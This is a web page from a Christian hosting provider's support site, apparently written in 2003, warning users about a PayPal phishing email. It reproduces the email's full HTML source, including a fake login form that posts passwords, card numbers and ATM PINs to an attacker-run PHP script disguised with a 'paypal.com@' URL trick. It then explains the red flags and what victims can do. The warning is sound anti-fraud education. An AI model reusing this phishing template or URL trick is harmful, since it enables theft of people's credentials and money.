Support Home
Service Notices
WebLog
Privacy Policy
Warnings and Scams
FTP
  Software
  FAQs
Tutorials
  MS Publisher
  FP2003 with FWS
  Mozilla Composer
  CoreFTP
  SmartFTP
  Web Folders
  Web Publishing Wizard
FrontPage
  FrontPage 98
  FrontPage 2000
Free Website
  Tips
  FAQs
ChurchServe Sites
  Homepage
  Services
  Free Website
  Contact Us
Five Pillars of Life
New book reveals the 5 pillars of life. Makes a great Christmas gift!
Location:   Home Warnings PayPal Scam

PayPal Scam

The following is VERY important information regarding a scam that is circulating around the Internet. I have personally recieved these emails soliciting private data in order to prevent my PayPal account from expiring. This page exposes this scam and shows you how not to fall victim to this.

The Email Message

First things first, the image below is an actual email I recieved claiming to be from PayPal:

PayPal Scam Email

This is actually a rather good imitation -- not only do the graphics look like PayPal graphics -- they ARE PayPal graphics because the images are being downloaded from PayPal's site. The rest was good work done to match PayPal's normal font and even add a standard disclaimer that even links to PayPal. So, did this email really come from PayPal?

To fine the answer, let's look at the email source:

Received: from compuserve.com [210.111.64.85] by (edit: my.local.mailserver.com)
  (SMTPD32-7.15) id AFD34E00088; Fri, 08 Aug 2003 19:26:59 -0500
Date: Sat, 09 Aug 2003 09:31:04 +0000
From: Lg5afei692 <lg5afei692@paypal.com>
Subject: Dear PayPal Customer
To: Mail <mail@mydomain.com>
References: <6821E52G438LB2CI@mydomain.com>
In-Reply-To: <6821E52G438LB2CI@mydomain.com>
Message-ID: <JFH5C141ILDL1485@paypal.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-RCPT-TO: <mail@mydomain.com>
Status: U
X-UIDL: 312892327

<html>
<head>
<STYLE type=text/css>
.dummy {}
BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;
color: #000000;}
UL {list-style: square}
.pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 
24px;font-weight: bold;color: #003366;} 
.pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 
22px;font-weight: bold;color: #003366;}   
.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 
18px;font-weight: bold;color: #003366;} 
.pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 
16px;font-weight: bold;color: #003366;}  
.pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 
11px;color: #003366;}   
.pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 
14px;font-weight: bold;color: #000000;}
.pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 
10px;font-weight: normal;color: #000000;}
.pp_smallbluetext {font-family: verdana,arial,helvetica,sans-serif;font-size: 
10px;font-weight: normal;color: #003366;}
.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 
11px;color: #aaaaaa;}    
</STYLE>
<title>PayPal</title>
</head>
<body>
<table width="600" cellspacing="0" cellpadding="0" border="0" align="center">
    <tr>
        <td><A href="https://www.paypal.com/"><
		IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109 
		height=35 alt="PayPal" border="0" vspace=10></A>
        </td>
    </tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
    <tr>
        <td background="http://www.paypal.com/images/bg_clk.gif" 
		width="100%"><img 
		src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"
		></td>
    </tr>   
    <tr>
        <td><img src="http://www.paypal.com/images/pixel.gif" height="10" 
		width="1" border="0"></td>
    </tr>
</table>
<table width="600" cellspacing="0" cellpadding="5" border="0" align="center">
  <tr> 
    <td class="pp_sortofbig" align=center>Dear PayPal Customer</td>
  </tr>
  <tr> 
    <td valign="top"><p> </p>
      <p>This e-mail is the notification of recent innovations taken by PayPal to 
	  detect inactive 
	  customers and              non-functioning mailboxes.</p>
      <p>The inactive customers are subject to restriction and removal in the next 
        3 months.</p>
      <p>Please confirm your email address and credit card information by logging 
	  in to your PayPal account 
        using the form below:</p></td>
  </tr>
  <tr> 
    <td align=center>

<form 
action="http://www.paypal.com@pitstylehomepage.port5.com/000pp.php" method="get">
      <p style="margin-left: 4; margin-top: -2; margin-bottom: 0"> </p>

      <table border="0">
        <tr>
          <td><b style="font:bold 8pt">Email Address:</b></td>
          <td><input name="lgn" type="text" size="30" 
		  maxlength="32"></td>
        </tr>
        <tr>
          <td><b style="font:bold 8pt">Password:</b></td>
          <td><input name="psw" type="password" size="30" 
		  maxlength="32"></td>
        </tr>
        <tr>
          <td><b style="font-style: normal; font-variant: normal; font-weight: 
		  bold; font-size: 8pt">Full Name: </b></td>
          <td><input name="full_name" type="text" size="30" 
		  maxlength="32"></td>
        </tr>
        <tr>
          <td><b style="font-style: normal; font-variant: normal; 
		  font-weight: bold; 
		  font-size: 8pt">Credit Card #: </b></td>
          <td><input name="cc" size="30" maxlength="30"></td>

 <tr>
          <td><b style="font-style: normal; font-variant: normal; 
		  font-weight: bold; 
		  font-size: 8pt">Exp.Date(mm/yyyy): </b></td>
          <td><input name="exp_date" size="30" maxlength="7"></td>

<tr>
          <td><b style="font:bold 8pt: normal; font-variant: normal; 
		  font-weight: bold; 
		  font-size: 8pt">ATM PIN (<font color=red>For Bank 
		  Verification</font>) #: </b></td>
          <td><input name="pin" type="password" size="30" maxlength="4"></td>


        </tr>
      </table>
        <p>
	<input name="ID" type="hidden" size="30" maxlength="32" value="n8h4hnew">
          <input type="submit" value="   Log In   ">
        </p>
      </form>
      <p><br>
        <span class="pp_smalltext">This notification expires 
		September 31, 2003</span> 
      </p></td>
  </tr>
  <tr> 
    <td align=center><br> <strong>
	Thanks for using PayPal! </strong><br></td>
  </tr>
  <tr> 
    <td><img src="http://www.paypal.com/images/dot_row_long.gif"></td>
  </tr>
  <tr> 
    <td class="pp_footer"> This PayPal notification was sent to your mailbox. 
      Your PayPal account is set up to receive the PayPal Periodical newsletter 
      and product updates when you create your account. To modify your notification 
      preferences and unsubscribe, go to 
<a href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</a> 
      and log in to your account. Changes to your preferences may take several 
      days to be reflected in our mailings. Replies to this email will not be
      processed. <br> <br>
      Copyright© 2002 PayPal Inc. All rights reserved. Designated trademarks 
      and brands are the property of their respective owners. </td>
  </tr>
</table>
</body></html>
NOTE: The above text, I had to reformat a little bit to make viewing this page more attrative.

Ok, I included all that code for the more geeky folks. But the main line of interest is:
<form action="http://www.paypal.com@pitstylehomepage.port5.com/000pp.php" method="get">

Notice where the form in the email posts? The www.paypal.com is just a distraction -- it really gets posted to a PHP script on pitstylehomepage.port5.com. Of course, this address will be different with each email. Each time, the email gets sent out, people complain to the FBI, PayPal, etc and within a few hours the site is usually shut down. Of course, this is plenty of time for several unsuspecting folks to give away valuable information.

Will the Real PayPal please stand up?

One of the reasons this scam is so well done and works wonderfully to trick so many is its likeness to a real PayPal email notice. They use all the same fonts, style of writing, and they even pull graphics from the PayPal site. Yeap, they didn't bother copying the graphics of PayPal -- they used them directly. In addition, this email even contains the very familar disclaimer message (that part of the email we usually don't bother reading anymore) that says you are recieving this email because you are subscribed on PayPal's services -- very typical stuff -- they probably just copied it from an actual PayPal newsletter email. If it looks like a duck, walks like a duck, quacks like a duck -- it still might be a scam.

What tipped me off this wasn't a real PayPal email was the content. Really look at the email. Would a PayPal send out an email requiring people to submit data from an unsecured email form? It turns out that PayPal never asks for passwords or bank information by email either. And of course, why would PayPal want my ATM pin number anyways? The answer is simple: PayPal doesn't need it, but the scammer wants it.

What's at Stake

Well, your online identity for starters. But more importantly, PayPal accounts frequently have Credit Cards attached to them (great for ebay users) and bank accounts as well. So, effectively, the scammer could easily waltz into your PayPal account, buy a really cool toy on Ebay. If your account has a positive balance, the scammer could get to that money too. Most people don't have more than $5 or $10 in the account, so most people use it to pay folks on Ebay with a Credit Card or Bank transfers (ETF).

As you can see, access to your PayPal account could be financially dangerous. This is why the real PayPal has precautions in place and policies that prevent them from asking for these types of information in non-secure ways (email, non-SSL webpages, etc).

What to do when you get this Email

Most people will simply delete the email when it comes in. However, I advocate a more proactive approach. The sooner someone knows about this scam, the sooner it can be shut down and less people will be taken advantage of.

When you get this email, please tell PayPal about it. Forward the email to: accessviolation@paypal.com and/or contact the PayPal Service Team (requires you to login to PayPal).

Oddly enough, the email address the message was sent to wasn't even registered with PayPal.

What to do if you are a Victim

There are a few things you will need to do:
  • Login to your PayPal account and see if there are any unusual transactions recently posted.
  • Contact your credit card and/or bank to let the know what has happened. Most likely, they will issue a fraud alert on your account. All transactions will be suspect and you may have to call in your new transactions or even be assigned a new account number.
  • Let PayPal know abou this, they have a vested interest in the security of their users. They have many resources about what to do if you fall victim to scams or fake sites/emails.
  • Let the FBI know: Their Internet Fraud Complain Center is an excellent resource. To actually file a complain, go to: http://www1.ifccfbi.gov/cf1.asp.
  • Let your friends and family know about this scam -- especially if you know they have a PayPal account or do a lot of Ebay business.
These things are not the only measures you can take, but they should at least be your first ones. Don't let pride get in the way! Several folks have been taken by this one. This scam is especially convincing because it looks just like a legit email from PayPal, right down to the disclaimer.

Resources and News Links

A few links to help you research this more. Don't just take my word for it. In addition, you can search major search engine (like Google) for PayPal scam and see what kind of results you get.

Final Remarks

This is not the first and only scam on PayPal users and this is not the only technique used. Other scams may involve going to another website (non-PayPal) and entering information there. Also, this type of scam is not limited to PayPal users, but also Ebay, major online retailers, and large ISPs. Always be skeptical of requests for information by email or sent in non-secure ways.

Hopefully, this page will prevent someone from making a very costly mistake in the future.

Copyright 1999-2005 ChurchServe Christian Hosting. All rights reserved.